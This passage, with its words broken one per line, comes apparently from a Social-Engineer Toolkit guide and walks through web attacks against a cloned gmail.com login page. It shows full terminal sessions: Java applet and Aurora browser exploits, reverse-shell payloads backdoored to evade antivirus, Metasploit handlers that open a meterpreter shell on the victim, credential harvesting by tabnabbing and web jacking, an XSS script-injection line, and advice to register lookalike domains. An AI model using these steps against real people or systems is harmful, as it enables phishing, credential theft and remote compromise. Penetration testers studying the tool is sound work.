Java
Applet
Attack
Method
2.
The
Metasploit
Browser
Exploit
Method
3.
Credential
Harvester
Attack
Method
4.
Tabnabbing
Attack
Method
5.
Man
Left
in
the
Middle
Attack
Method
6.
Web
Jacking
Attack
Method
7.
Multi-Attack
Web
Method
8.
Return
to
the
previous
menu
Enter
your
choice
(press
enter
for
default):
1
The
first
method
will
allow
SET
to
import
a
list
of
pre-defined
web
applications
that
it
can
utilize
within
the
attack.
The
second
method
will
completely
clone
a
website
of
your
choosing
and
allow
you
to
utilize
the
attack
vectors
within
the
completely
same
web
application
you
were
attempting
to
clone.
The
third
method
allows
you
to
import
your
own
website,
note
that
you
should
only
have
an
index.html
when
using
the
import
website
functionality.
[!]
Website
Attack
Vectors
[!]
1.
Web
Templates
2.
Site
Cloner
3.
Custom
Import
4.
Return
to
main
menu
Enter
number
(1-4):
2
SET
supports
both
HTTP
and
HTTPS
Example:
http://www.thisisafakesite.com
Enter
the
url
to
clone:
https://gmail.com
[*]
Cloning
the
website:
https://gmail.com
[*]
This
could
take
a
little
bit...
[*]
Injecting
Java
Applet
attack
into
the
newly
cloned
website.
irc.freenode.net
#social-engineer
19
[*]
Filename
obfuscation
complete.
Payload
name
is:
tgbYm1k69
[*]
Malicious
java
applet
website
prepped
for
deployment
What
payload
do
you
want
to
generate:
Name:
Description:
1.
Windows
Shell
Reverse_TCP
Spawn
a
command
shell
on
victim
and
send
back
to
attacker.
2.
Windows
Reverse_TCP
Meterpreter
Spawn
a
meterpreter
shell
on
victim
and
send
back
to
attacker.
3.
Windows
Reverse_TCP
VNC
DLL
Spawn
a
VNC
server
on
victim
and
send
back
to
attacker.
4.
Windows
Bind
Shell
Execute
payload
and
create
an
accepting
port
on
remote
system.
5.
Windows
Bind
Shell
X64
Windows
x64
Command
Shell,
Bind
TCP
Inline
6.
Windows
Shell
Reverse_TCP
X64
Windows
X64
Command
Shell,
Reverse
TCP
Inline
7.
Windows
Meterpreter
Reverse_TCP
X64
Connect
back
to
the
attacker
(Windows
x64),
Meterpreter
8.
Windows
Meterpreter
Egress
Buster
Spawn
a
meterpreter
shell
and
find
a
port
home
via
multiple
ports
9.
Import
your
own
executable
Specify
a
path
for
your
own
executable
Enter
choice
(hit
enter
for
default):
2
Below
is
a
list
of
encodings
to
try
and
bypass
AV.
Select
one
of
the
below,
'backdoored
executable'
is
typically
the
best.
1.
avoid_utf8_tolower
(Normal)
2.
shikata_ga_nai
(Very
Good)
3.
alpha_mixed
(Normal)
4.
alpha_upper
(Normal)
5.
call4_dword_xor
(Normal)
6.
countdown
(Normal)
7.
fnstenv_mov
(Normal)
8.
jmp_call_additive
(Normal)
9.
nonalpha
(Normal)
10.
nonupper
(Normal)
11.
unicode_mixed
(Normal)
12.
unicode_upper
(Normal)
13.
alpha2
(Normal)
14.
No
Encoding
(None)
15.
Multi-Encoder
(Excellent)
irc.freenode.net
#social-engineer
20
16.
Backdoored
Executable
(BEST)
Enter
your
choice
(enter
for
default):
16
[-]
Enter
the
PORT
of
the
listener
(enter
for
default):
443
[-]
Backdooring
a
legit
executable
to
bypass
Anti-Virus.
Wait
a
few
seconds...
[-]
Backdoor
completed
successfully.
Payload
is
now
hidden
within
a
legit
executable.
********************************************************
Do
you
want
to
create
a
Linux/OSX
reverse_tcp
payload
in
the
Java
Applet
attack
as
well?
********************************************************
Enter
choice
yes
or
no:
yes
Enter
the
port
to
listen
for
on
OSX:
8080
Enter
the
port
to
listen
for
on
Linux:
8081
Created
by
msfpayload
(http://www.metasploit.com).
Payload:
osx/x86/shell_reverse_tcp
Length:
65
Options:
LHOST=172.16.32.129,LPORT=8080
Created
by
msfpayload
(http://www.metasploit.com).
Payload:
linux/x86/shell/reverse_tcp
Length:
50
Options:
LHOST=172.16.32.129,LPORT=8081
***************************************************
Web
Server
Launched.
Welcome
to
the
SET
Web
Attack.
***************************************************
[--]
Tested
on
IE6,
IE7,
IE8,
Safari,
Chrome,
and
FireFox
[--]
[*]
Launching
MSF
Listener...
[*]
This
may
take
a
few
to
load
MSF...
[-]
***
[-]
*
WARNING:
No
database
support:
String
User
Disabled
Database
Support
[-]
***
_
|
|
o
_
_
_
_
_|_
__,
,
_
|
|
__
_|_
/
|/
|/
|
|/
|
/
|
/
\_|/
\_|/
/
\_|
|
|
|
|_/|__/|_/\_/|_/
\/
|__/
|__/\__/
|_/|_/
/|
\|
irc.freenode.net
#social-engineer
21
=[
metasploit
v3.4.2-dev
[core:3.4
api:1.0]
+
--
--=[
588
exploits
-
300
auxiliary
+
--
--=[
224
payloads
-
27
encoders
-
8
nops
=[
svn
r10268
updated
today
(2010.09.09)
resource
(src/program_junk/meta_config)>
use
exploit/multi/handler
resource
(src/program_junk/meta_config)>
set
PAYLOAD
windows/meterpreter/reverse_tcp
PAYLOAD
=>
windows/meterpreter/reverse_tcp
resource
(src/program_junk/meta_config)>
set
LHOST
0.0.0.0
LHOST
=>
0.0.0.0
resource
(src/program_junk/meta_config)>
set
LPORT
443
LPORT
=>
443
resource
(src/program_junk/meta_config)>
set
ExitOnSession
false
ExitOnSession
=>
false
resource
(src/program_junk/meta_config)>
exploit
-j
[*]
Exploit
running
as
background
job.
resource
(src/program_junk/meta_config)>
use
exploit/multi/handler
resource
(src/program_junk/meta_config)>
set
PAYLOAD
osx/x86/shell_reverse_tcp
PAYLOAD
=>
osx/x86/shell_reverse_tcp
resource
(src/program_junk/meta_config)>
set
LHOST
172.16.32.129
LHOST
=>
172.16.32.129
resource
(src/program_junk/meta_config)>
set
LPORT
8080
LPORT
=>
8080
resource
(src/program_junk/meta_config)>
set
ExitOnSession
false
ExitOnSession
=>
false
[*]
Started
reverse
handler
on
0.0.0.0:443
resource
(src/program_junk/meta_config)>
exploit
-j
[*]
Starting
the
payload
handler...
[*]
Exploit
running
as
background
job.
resource
(src/program_junk/meta_config)>
use
exploit/multi/handler
resource
(src/program_junk/meta_config)>
set
PAYLOAD
linux/x86/shell/reverse_tcp
PAYLOAD
=>
linux/x86/shell/reverse_tcp
resource
(src/program_junk/meta_config)>
set
LHOST
172.16.32.129
LHOST
=>
172.16.32.129
resource
(src/program_junk/meta_config)>
set
LPORT
8081
LPORT
=>
8081
resource
(src/program_junk/meta_config)>
set
ExitOnSession
false
ExitOnSession
=>
false
resource
(src/program_junk/meta_config)>
set
AutoRunScript
migrate
-f
[*]
Started
reverse
handler
on
172.16.32.129:8080
AutoRunScript
=>
migrate
-f
resource
(src/program_junk/meta_config)>
exploit
-j
irc.freenode.net
#social-engineer
22
[*]
Starting
the
payload
handler...
[*]
Exploit
running
as
background
job.
msf
exploit(handler)
>
[*]
Started
reverse
handler
on
172.16.32.129:8081
[*]
Starting
the
payload
handler...
In
this
attack,
weve
set
up
our
scenario
to
clone
https://gmail.com
and
use
the
reverse
meterpreter
attack
vector
on
port
443.
Weve
used
the
backdoored
executable
to
hopefully
bypass
anti-virus
and
setup
Metasploit
to
handler
the
reverse
connections.
If
you
wanted
to
utilize
an
email
with
this
attack
vector
you
could
turn
the
config/set_config
turn
the
WEBATTACK_EMAIL=OFF
to
WEBATTACK_EMAIL=ON.
When
you
get
a
victim
to
click
a
link
or
coax
him
to
your
website,
it
will
look
something
like
this:
As
soon
as
the
victim
clicks
run,
you
are
presented
with
a
meterpreter
shell,
and
the
victim
is
redirected
back
to
the
original
Google
site
completely
unaware
that
they
have
been
compromised.
[*]
Sending
stage
(748544
bytes)
to
172.16.32.131
[*]
Meterpreter
session
1
opened
(172.16.32.129:443
->
172.16.32.131:1183)
at
Thu
Sep
09
10:06:57
-0400
2010
msf
exploit(handler)
>
sessions
-i
1
[*]
Starting
interaction
with
1...
meterpreter
>
shell
Process
2988
created.
Channel
1
created.
Microsoft
Windows
XP
[Version
5.1.2600]
(C)
Copyright
1985-2001
Microsoft
Corp.
C:\Documents
and
Settings\Administrator\Desktop>
irc.freenode.net #social-engineer
23
The
Metasploit
Browser
Exploit
Method
will
import
Metasploit
client-side
exploits
with
the
ability
to
clone
the
website
and
utilize
browser-based
exploits.
Lets
take
a
quick
look
on
exploiting
a
browser
exploit
through
SET.
Select
from
the
menu:
1.
Spear-Phishing
Attack
Vectors
2.
Website
Attack
Vectors
3.
Infectious
Media
Generator
4.
Create
a
Payload
and
Listener
5.
Mass
Mailer
Attack
6.
Teensy
USB
HID
Attack
Vector
7.
SMS
Spoofing
Attack
Vector
8
Update
the
Metasploit
Framework
9.
Update
the
Social-Engineer
Toolkit
10.
Help,
Credits,
and
About
11.
Exit
the
Social-Engineer
Toolkit
Enter
your
choice:
2
The
Social-Engineer
Toolkit
"Web
Attack"
vector
is
a
unique
way
of
utilizing
multiple
web-based
attacks
in
order
to
compromise
the
intended
victim.
Enter
what
type
of
attack
you
would
like
to
utilize.
The
Java
Applet
attack
will
spoof
a
Java
Certificate
and
deliver
a
metasploit
based
payload.
Uses
a
customized
java
applet
created
by
Thomas
Werth
to
deliver
the
payload.
The
Metasploit
browser
exploit
method
will
utilize
select
Metasploit
browser
exploits
through
an
iframe
and
deliver
a
Metasploit
payload.
The
Credential
Harvester
Method
will
utilize
web
cloning
of
a
website
that
has
a
username
and
password
field
and
harvest
all
the
information
posted
to
the
website.
The
TabNabbing
Method
will
wait
for
a
user
to
move
to
a
irc.freenode.net #social-engineer
24
different
tab,
then
refresh
the
page
to
something
different.
The
Man
Left
in
the
Middle
Attack
Method
was
introduced
by
Kos
and
utilizes
HTTP
REFERER's
in
order
to
intercept
fields
and
harvest
data
from
them.
You
need
to
have
an
already
vulnerable
site
and
incorporate
<script
src="http://YOURIP/">.
This
could
either
be
from
a
compromised
site
or
through
XSS.
The
web
jacking
attack
method
was
introduced
by
white_sheep,
Emgent
and
the
Back|Track
team.
This
method
utilizes
iframe
replacements
to
make
the
highlighted
URL
link
to
appear
legitimate
however
when
clicked
a
window
pops
up
then
is
replaced
with
the
malicious
link.
You
can
edit
the
link
replacement
settings
in
the
set_config
if
its
to
slow/fast.
The
multi-attack
will
add
a
combination
of
attacks
through
the
web
attack
menu.
For
example
you
can
utilize
the
Java
Applet,
Metasploit
Browser,
Credential
Harvester/Tabnabbing,
and
the
Man
Left
in
the
Middle
attack
all
at
once
to
see
which
is
successful.
1.
The
Java
Applet
Attack
Method
2.
The
Metasploit
Browser
Exploit
Method
3.
Credential
Harvester
Attack
Method
4.
Tabnabbing
Attack
Method
5.
Man
Left
in
the
Middle
Attack
Method
6.
Web
Jacking
Attack
Method
7.
Multi-Attack
Web
Method
8.
Return
to
the
previous
menu
Enter
your
choice
(press
enter
for
default):
2
The
first
method
will
allow
SET
to
import
a
list
of
pre-defined
web
applications
that
it
can
utilize
within
the
attack.
The
second
method
will
completely
clone
a
website
of
your
choosing
and
allow
you
to
utilize
the
attack
vectors
within
the
completely
same
web
application
you
were
attempting
to
clone.
The
third
method
allows
you
to
import
your
own
website,
note
that
you
should
only
have
an
index.html
when
using
the
import
website
functionality.
[!]
Website
Attack
Vectors
[!]
1.
Web
Templates
2.
Site
Cloner
irc.freenode.net
#social-engineer
25
3.
Custom
Import
4.
Return
to
main
menu
Enter
number
(1-4):
2
SET
supports
both
HTTP
and
HTTPS
Example:
http://www.thisisafakesite.com
Enter
the
url
to
clone:
https://gmail.com
Enter
the
browser
exploit
you
would
like
to
use
1.
Internet
Explorer
CSS
Tags
Memory
Corruption
2.
Sun
Java
Runtime
New
Plugin
docbase
Buffer
Overflow
3.
Microsoft
Windows
WebDAV
Application
DLL
Hijacker
4.
Adobe
Shockwave
rcsL
Memory
Corruption
Exploit
5.
Adobe
CoolType
SING
Table
"uniqueName"
Stack
Buffer
Overflow
6.
Apple
QuickTime
7.6.7
_Marshaled_pUnk
Code
Execution
7.
Microsoft
Help
Center
XSS
and
Command
Execution
(MS10-042)
8.
Microsoft
Internet
Explorer
iepeers.dll
Use
After
Free
(MS10-018)
9.
Microsoft
Internet
Explorer
Tabular
Data
Control
Exploit
(MS10-018)
10.
Microsoft
Internet
Explorer
"Aurora"
Memory
Corruption
(MS10-002)
11.
Microsoft
Internet
Explorer
7
Uninitialized
Memory
Corruption
(MS09-
002)
12.
Microsoft
Internet
Explorer
Style
getElementsbyTagName
Corruption
(MS09-072)
13.
Microsoft
Internet
Explorer
isComponentInstalled
Overflow
14.
Microsoft
Internet
Explorer
Explorer
Data
Binding
Corruption
(MS08-078)
15.
Microsoft
Internet
Explorer
Unsafe
Scripting
Misconfiguration
16.
FireFox
3.5
escape
Return
Value
Memory
Corruption
17.
Metasploit
Browser
Autopwn
(USE
AT
OWN
RISK!)
Enter
your
choice
(1-17)
(enter
for
default):
7
What
payload
do
you
want
to
generate:
Name:
Description:
1.
Windows
Shell
Reverse_TCP
Spawn
a
command
shell
on
victim
and
send
back
to
attacker.
2.
Windows
Reverse_TCP
Meterpreter
Spawn
a
meterpreter
shell
on
victim
and
send
back
to
attacker.
3.
Windows
Reverse_TCP
VNC
DLL
Spawn
a
VNC
server
on
victim
and
send
back
to
attacker.
4.
Windows
Bind
Shell
Execute
payload
and
create
an
accepting
port
on
remote
system.
5.
Windows
Bind
Shell
X64
Windows
x64
Command
Shell,
Bind
TCP
Inline
irc.freenode.net
#social-engineer
26
6.
Windows
Shell
Reverse_TCP
X64
Windows
X64
Command
Shell,
Reverse
TCP
Inline
7.
Windows
Meterpreter
Reverse_TCP
X64
Connect
back
to
the
attacker
(Windows
x64),
Meterpreter
8.
Windows
Meterpreter
Egress
Buster
Spawn
a
meterpreter
shell
and
find
a
port
home
via
multiple
ports
9.
Download/Run
your
Own
Executable
Downloads
an
executable
and
runs
it
Enter
choice
(example
1-8)
(Enter
for
default):
Enter
the
port
to
use
for
the
reverse
(enter
for
default):
[*]
Cloning
the
website:
https://gmail.com
[*]
This
could
take
a
little
bit...
[*]
Injecting
iframes
into
cloned
website
for
MSF
Attack....
[*]
Malicious
iframe
injection
successful...crafting
payload.
***************************************************
Web
Server
Launched.
Welcome
to
the
SET
Web
Attack.
***************************************************
[--]
Tested
on
IE6,
IE7,
IE8,
Safari,
Chrome,
and
FireFox
[--]
[*]
Launching
MSF
Listener...
[*]
This
may
take
a
few
to
load
MSF...
[-]
***
[-]
*
WARNING:
No
database
support:
String
User
Disabled
Database
Support
[-]
***
##
###
##
##
##
##
####
######
####
#####
#####
##
####
######
#######
##
##
##
##
##
##
##
##
##
##
###
##
#######
######
##
#####
####
##
##
##
##
##
##
##
##
#
##
##
##
##
##
##
#####
##
##
##
##
##
##
##
####
###
#####
#####
##
####
####
####
###
##
=[
metasploit
v3.4.2-dev
[core:3.4
api:1.0]
+
--
--=[
588
exploits
-
300
auxiliary
+
--
--=[
224
payloads
-
27
encoders
-
8
nops
=[
svn
r10268
updated
today
(2010.09.09)
resource
(src/program_junk/meta_config)>
use
windows/browser/ms10_002_aurora
irc.freenode.net
#social-engineer
27
resource
(src/program_junk/meta_config)>
set
PAYLOAD
windows/meterpreter/reverse_tcp
PAYLOAD
=>
windows/meterpreter/reverse_tcp
resource
(src/program_junk/meta_config)>
set
LHOST
172.16.32.129
LHOST
=>
172.16.32.129
resource
(src/program_junk/meta_config)>
set
LPORT
443
LPORT
=>
443
resource
(src/program_junk/meta_config)>
set
URIPATH
/
URIPATH
=>
/
resource
(src/program_junk/meta_config)>
set
SRVPORT
8080
SRVPORT
=>
8080
resource
(src/program_junk/meta_config)>
set
ExitOnSession
false
ExitOnSession
=>
false
resource
(src/program_junk/meta_config)>
exploit
-j
[*]
Exploit
running
as
background
job.
msf
exploit(ms10_002_aurora)
>
[*]
Started
reverse
handler
on
172.16.32.129:443
[*]
Using
URL:
http://0.0.0.0:8080/
[*]
Local
IP:
http://172.16.32.129:8080/
[*]
Server
started.
Once
the
victim
browses
the
website,
it
will
look
exactly
like
the
site
you
cloned
and
then
compromise
the
system.
[*]
Sending
stage
(748544
bytes)
to
172.16.32.131
[*]
Meterpreter
session
1
opened
(172.16.32.129:443
->
172.16.32.131:1183)
at
Thu
Sep
09
10:14:22
-0400
2010
msf
exploit(handler)
>
sessions
-i
1
[*]
Starting
interaction
with
1...
meterpreter
>
shell
Process
2988
created.
Channel
1
created.
Microsoft
Windows
XP
[Version
5.1.2600]
(C)
Copyright
1985-2001
Microsoft
Corp.
C:\Documents
and
Settings\Administrator\Desktop>
The
credential
harvester
attack
method
is
used
when
you
dont
want
to
specifically
get
a
shell
but
perform
phishing
attacks
in
order
to
obtain
username
and
passwords
irc.freenode.net #social-engineer
28
from
the
system.
In
this
attack
vector,
a
website
will
be
cloned,
and
when
the
victim
enters
in
the
user
credentials,
the
usernames
and
passwords
will
be
posted
back
to
your
machine
and
then
the
victim
will
be
redirected
back
to
the
legitimate
site.
1.
The
Java
Applet
Attack
Method
2.
The
Metasploit
Browser
Exploit
Method
3.
Credential
Harvester
Attack
Method
4.
Tabnabbing
Attack
Method
5.
Man
Left
in
the
Middle
Attack
Method
6.
Web
Jacking
Attack
Method
7.
Multi-Attack
Web
Method
8.
Return
to
the
previous
menu
Enter
your
choice
(press
enter
for
default):
3
The
first
method
will
allow
SET
to
import
a
list
of
pre-defined
web
applications
that
it
can
utilize
within
the
attack.
The
second
method
will
completely
clone
a
website
of
your
choosing
and
allow
you
to
utilize
the
attack
vectors
within
the
completely
same
web
application
you
were
attempting
to
clone.
The
third
method
allows
you
to
import
your
own
website,
note
that
you
should
only
have
an
index.html
when
using
the
import
website
functionality.
[!]
Website
Attack
Vectors
[!]
1.
Web
Templates
2.
Site
Cloner
3.
Custom
Import
4.
Return
to
main
menu
Enter
number
(1-4):
2
Email
harvester
will
allow
you
to
utilize
the
clone
capabilities
within
SET
to
harvest
credentials
or
parameters
from
a
website
as
well
as
place
them
into
a
report.
SET
supports
both
HTTP
and
HTTPS
Example:
http://www.thisisafakesite.com
Enter
the
url
to
clone:
https://gmail.com
[*]
Cloning
the
website:
https://gmail.com
irc.freenode.net
#social-engineer
29
[*]
This
could
take
a
little
bit...
The
best
way
to
use
this
attack
is
if
username
and
password
form
fields
are
available.
Regardless,
this
captures
all
POSTs
on
a
website.
[*]
I
have
read
the
above
message.
[*]
Press
{return}
to
continue.
[*]
Social-Engineer
Toolkit
Credential
Harvester
Attack
[*]
Credential
Harvester
is
running
on
port
80
[*]
Information
will
be
displayed
to
you
as
it
arrives
below:
Once
the
victim
clicks
the
link,
they
will
be
presented
with
an
exact
replica
of
gmail.com
and
hopefully
be
enticed
to
enter
their
username
and
password
into
the
form
fields.
As
soon
as
the
victim
hits
sign
in,
we
are
presented
with
the
credentials
and
the
victim
is
redirected
back
to
the
legitimate
site.
[*]
Social-Engineer
Toolkit
Credential
Harvester
Attack
[*]
Credential
Harvester
is
running
on
port
80
[*]
Information
will
be
displayed
to
you
as
it
arrives
below:
172.16.32.131
-
-
[09/Sep/2010
10:12:55]
"GET
/
HTTP/1.1"
200
-
[*]
WE
GOT
A
HIT!
Printing
the
output:
PARAM:
ltmpl=default
PARAM:
ltmplcache=2
PARAM:
continue=https://mail.google.com/mail/?
PARAM:
service=mail
PARAM:
rm=false
PARAM:
dsh=-7536764660264620804
PARAM:
ltmpl=default
irc.freenode.net #social-engineer
30
PARAM:
ltmpl=default
PARAM:
scc=1
PARAM:
ss=1
PARAM:
timeStmp=
PARAM:
secTok=
PARAM:
GALX=nwAWNiTEqGc
POSSIBLE
USERNAME
FIELD
FOUND:
Email=thisismyuser
POSSIBLE
PASSWORD
FIELD
FOUND:
Passwd=thisismypassword
PARAM:
rmShown=1
PARAM:
signIn=Sign+in
PARAM:
asts=
[*]
WHEN
YOUR
FINISHED.
HIT
CONTROL-C
TO
GENERATE
A
REPORT
Also
note
that
when
your
finished
to
hit
CONTROL-C,
and
a
report
will
be
generated
for
you
in
two
formats.
The
first
is
an
html
based
report,
the
other
is
xml
if
you
need
to
parse
the
information
into
another
tool.
^C[*]
File
exported
to
reports/2010-09-09
10:14:30.152435.html
for
your
reading
pleasure...
[*]
File
in
XML
format
exported
to
reports/2010-09-09
10:14:30.152435.xml
for
your
reading
pleasure...
Press
{return}
to
return
to
the
menu.^C
The
Social-Engineer
Toolkit
"Web
Attack"
vector
is
a
unique
way
of
utilizing
multiple
web-based
attacks
in
order
to
compromise
the
intended
victim.
Enter
what
type
of
attack
you
would
like
to
utilize.
The
Java
Applet
attack
will
spoof
a
Java
Certificate
and
deliver
a
metasploit
based
payload.
Uses
a
customized
java
applet
created
by
Thomas
Werth
to
deliver
the
payload.
The
Metasploit
browser
exploit
method
will
utilize
select
Metasploit
browser
exploits
through
an
iframe
and
deliver
a
Metasploit
payload.
The
Credential
Harvester
Method
will
utilize
web
cloning
of
a
website
that
has
a
username
and
password
field
and
harvest
all
the
information
posted
to
the
website.
The
TabNabbing
Method
will
wait
for
a
user
to
move
to
a
different
tab,
then
refresh
the
page
to
something
different.
The
Man
Left
in
the
Middle
Attack
Method
was
introduced
by
irc.freenode.net
#social-engineer
31
Kos
and
utilizes
HTTP
REFERER's
in
order
to
intercept
fields
and
harvest
data
from
them.
You
need
to
have
an
already
vulnerable
site
and
incorporate
<script
src="http://YOURIP/">.
This
could
either
be
from
a
compromised
site
or
through
XSS.
The
web
jacking
attack
method
was
introduced
by
white_sheep,
Emgent
and
the
Back|Track
team.
This
method
utilizes
iframe
replacements
to
make
the
highlighted
URL
link
to
appear
legitimate
however
when
clicked
a
window
pops
up
then
is
replaced
with
the
malicious
link.
You
can
edit
the
link
replacement
settings
in
the
set_config
if
its
to
slow/fast.
The
multi-attack
will
add
a
combination
of
attacks
through
the
web
attack
menu.
For
example
you
can
utilize
the
Java
Applet,
Metasploit
Browser,
Credential
Harvester/Tabnabbing,
and
the
Man
Left
in
the
Middle
attack
all
at
once
to
see
which
is
successful.
1.
The
Java
Applet
Attack
Method
2.
The
Metasploit
Browser
Exploit
Method
3.
Credential
Harvester
Attack
Method
4.
Tabnabbing
Attack
Method
5.
Man
Left
in
the
Middle
Attack
Method
6.
Web
Jacking
Attack
Method
7.
Multi-Attack
Web
Method
8.
Return
to
the
previous
menu
Enter
your
choice
(press
enter
for
default):
^C
Thank
you
for
shopping
at
the
Social-Engineer
Toolkit.
Hack
the
Gibson...
root@bt:/pentest/exploits/set#
firefox
reports/2010-09-09\
10\:14\:30.152435.
2010-09-09
10:14:30.152435.html
2010-09-09
10:14:30.152435.xml
root@bt:/pentest/exploits/set#
firefox
reports/2010-09-09\
10\:14\:30.152435.html
irc.freenode.net #social-engineer
32
The
tabnabbing
attack
method
is
used
when
a
victim
has
multiple
tabs
open,
when
the
user
clicks
the
link,
the
victim
will
be
presented
with
a
Please
wait
while
the
page
loads.
When
the
victim
switches
tabs
because
he/she
is
multi-tasking,
the
website
detects
that
a
different
tab
is
present
and
rewrites
the
webpage
to
a
website
you
specify.
The
victim
clicks
back
on
the
tab
after
a
period
of
time
and
thinks
they
were
signed
out
of
their
email
program
or
their
business
application
and
types
the
credentials
in.
When
the
credentials
are
inserts,
they
are
harvested
and
the
user
is
redirected
back
to
the
original
website.
1.
The
Java
Applet
Attack
Method
2.
The
Metasploit
Browser
Exploit
Method
3.
Credential
Harvester
Attack
Method
4.
Tabnabbing
Attack
Method
5.
Man
Left
in
the
Middle
Attack
Method
6.
Web
Jacking
Attack
Method
7.
Multi-Attack
Web
Method
8.
Return
to
the
previous
menu
Enter
your
choice
(press
enter
for
default):
4
The
first
method
will
allow
SET
to
import
a
list
of
pre-defined
web
applications
that
it
can
utilize
within
the
attack.
The
second
method
will
completely
clone
a
website
of
your
choosing
irc.freenode.net
#social-engineer
33
and
allow
you
to
utilize
the
attack
vectors
within
the
completely
same
web
application
you
were
attempting
to
clone.
The
third
method
allows
you
to
import
your
own
website,
note
that
you
should
only
have
an
index.html
when
using
the
import
website
functionality.
[!]
Website
Attack
Vectors
[!]
1.
Web
Templates
2.
Site
Cloner
3.
Custom
Import
4.
Return
to
main
menu
Enter
number
(1-4):
2
SET
supports
both
HTTP
and
HTTPS
Example:
http://www.thisisafakesite.com
Enter
the
url
to
clone:
https://gmail.com
[*]
Cloning
the
website:
https://gmail.com
[*]
This
could
take
a
little
bit...
The
best
way
to
use
this
attack
is
if
username
and
password
form
fields
are
available.
Regardless,
this
captures
all
POSTs
on
a
website.
[*]
I
have
read
the
above
message.
[*]
Press
{return}
to
continue.
[*]
Tabnabbing
Attack
Vector
is
Enabled...Victim
needs
to
switch
tabs.
[*]
Social-Engineer
Toolkit
Credential
Harvester
Attack
[*]
Credential
Harvester
is
running
on
port
80
[*]
Information
will
be
displayed
to
you
as
it
arrives
below:
The
victim
is
presented
with
a
webpage
that
says
please
wait
while
the
page
loads.
When
the
victim
switches
tabs,
the
website
is
rewritten
and
then
enters
the
credentials
and
is
harvested.
irc.freenode.net #social-engineer
34
[*]
WE
GOT
A
HIT!
Printing
the
output:
PARAM:
ltmpl=default
PARAM:
ltmplcache=2
PARAM:
continue=https://mail.google.com/mail/?
PARAM:
service=mail
PARAM:
rm=false
PARAM:
dsh=-9060819085229816070
PARAM:
ltmpl=default
PARAM:
ltmpl=default
PARAM:
scc=1
PARAM:
ss=1
PARAM:
timeStmp=
PARAM:
secTok=
PARAM:
GALX=00-69E-Tt5g
POSSIBLE
USERNAME
FIELD
FOUND:
Email=sfdsfsd
POSSIBLE
PASSWORD
FIELD
FOUND:
Passwd=afds
PARAM:
rmShown=1
PARAM:
signIn=Sign+in
PARAM:
asts=
[*]
WHEN
YOUR
FINISHED.
HIT
CONTROL-C
TO
GENERATE
A
REPORT
The
man
left
in
the
middle
attack
utilizes
HTTP
REFERERS
on
an
already
compromised
site
or
XSS
vulnerability
to
pass
the
credentials
back
to
the
HTTP
irc.freenode.net #social-engineer
35
server.
In
this
instance
if
you
find
a
XSS
vulnerability
and
send
the
URL
to
the
victim
and
they
click,
the
website
will
operate
100
percent
however
when
they
go
to
log
into
the
system,
it
will
pass
the
credentials
back
to
the
attacker
and
harvest
the
credentials.
1.
The
Java
Applet
Attack
Method
2.
The
Metasploit
Browser
Exploit
Method
3.
Credential
Harvester
Attack
Method
4.
Tabnabbing
Attack
Method
5.
Man
Left
in
the
Middle
Attack
Method
6.
Web
Jacking
Attack
Method
7.
Multi-Attack
Web
Method
8.
Return
to
the
previous
menu
Enter
your
choice
(press
enter
for
default):
5
***************************************************
Web
Server
Launched.
Welcome
to
the
SET
MLTM.
***************************************************
Man
Left
in
the
Middle
Attack
brought
to
you
by:
Kyle
Osborn
-
kyle@kyleosborn.com
Starting
server
on
0.0.0.0:80...
[*]
Server
has
started
The
web
jacking
attack
method
will
create
a
website
clone
and
present
the
victim
with
a
link
stating
that
the
website
has
moved.
This
is
a
new
feature
to
version
0.7.1.
When
you
hover
over
the
link,
the
URL
will
be
presented
with
the
real
URL,
not
the
attackers
machine.
So
for
example
if
your
cloning
gmail.com,
the
url
when
hovered
over
it
would
be
gmail.com.
When
the
user
clicks
the
moved
link,
gmail
opens
and
then
is
quickly
replaced
with
your
malicious
webserver.
Remember
you
can
change
the
timing
of
the
webjacking
attack
in
the
config/set_config
flags.
1.
The
Java
Applet
Attack
Method
2.
The
Metasploit
Browser
Exploit
Method
3.
Credential
Harvester
Attack
Method
4.
Tabnabbing
Attack
Method
5.
Man
Left
in
the
Middle
Attack
Method
6.
Web
Jacking
Attack
Method
7.
Multi-Attack
Web
Method
8.
Return
to
the
previous
menu
irc.freenode.net #social-engineer
36
Enter
your
choice
(press
enter
for
default):
6
The
first
method
will
allow
SET
to
import
a
list
of
pre-defined
web
applications
that
it
can
utilize
within
the
attack.
The
second
method
will
completely
clone
a
website
of
your
choosing
and
allow
you
to
utilize
the
attack
vectors
within
the
completely
same
web
application
you
were
attempting
to
clone.
The
third
method
allows
you
to
import
your
own
website,
note
that
you
should
only
have
an
index.html
when
using
the
import
website
functionality.
[!]
Website
Attack
Vectors
[!]
1.
Web
Templates
2.
Site
Cloner
3.
Custom
Import
4.
Return
to
main
menu
Enter
number
(1-4):
2
SET
supports
both
HTTP
and
HTTPS
Example:
http://www.thisisafakesite.com
Enter
the
url
to
clone:
https://gmail.com
[*]
Cloning
the
website:
https://gmail.com
[*]
This
could
take
a
little
bit...
The
best
way
to
use
this
attack
is
if
username
and
password
form
fields
are
available.
Regardless,
this
captures
all
POSTs
on
a
website.
[*]
I
have
read
the
above
message.
[*]
Press
{return}
to
continue.
[*]
Web
Jacking
Attack
Vector
is
Enabled...Victim
needs
to
click
the
link.
[*]
Social-Engineer
Toolkit
Credential
Harvester
Attack
[*]
Credential
Harvester
is
running
on
port
80
[*]
Information
will
be
displayed
to
you
as
it
arrives
below:
When
the
victim
goes
to
the
site
he/she
will
notice
the
link
below,
notice
the
bottom
left
URL,
its
gmail.com.
irc.freenode.net #social-engineer
37
When
the
victim
clicks
the
link
he
is
presented
with
the
following
webpage:
If
you
notice
the
URL
bar
we
are
at
our
malicious
web
server.
In
cases
with
social-
engineering,
you
want
to
make
it
believable,
using
an
IP
address
is
generally
a
bad
idea.
My
recommendation
is
if
your
doing
a
penetration
test,
register
a
name
thats
similar
to
the
victim,
for
gmail
you
could
do
gmai1.com
(notice
the
1),
something
similar
that
can
mistake
the
user
into
thinking
its
the
legitimate
site.
Most
of
the
time
they
wont
even
notice
the
IP
but
its
just
another
way
to
ensure
it
goes
on
irc.freenode.net
#social-engineer
38
without
a
hitch.
Now
that
the
victim
enters
the
username
and
password
in
the
fields,
you
will
notice
that
we
can
intercept
the
credentials
now.
[*]
Web
Jacking
Attack
Vector
is
Enabled...Victim
needs
to
click
the
link.
[*]
Social-Engineer
Toolkit
Credential
Harvester
Attack
[*]
Credential
Harvester
is
running
on
port
80
[*]
Information
will
be
displayed
to
you
as
it
arrives
below:
172.16.32.131
-
-
[09/Sep/2010
12:15:13]
"GET
/
HTTP/1.1"
200
-
172.16.32.131
-
-
[09/Sep/2010
12:15:56]
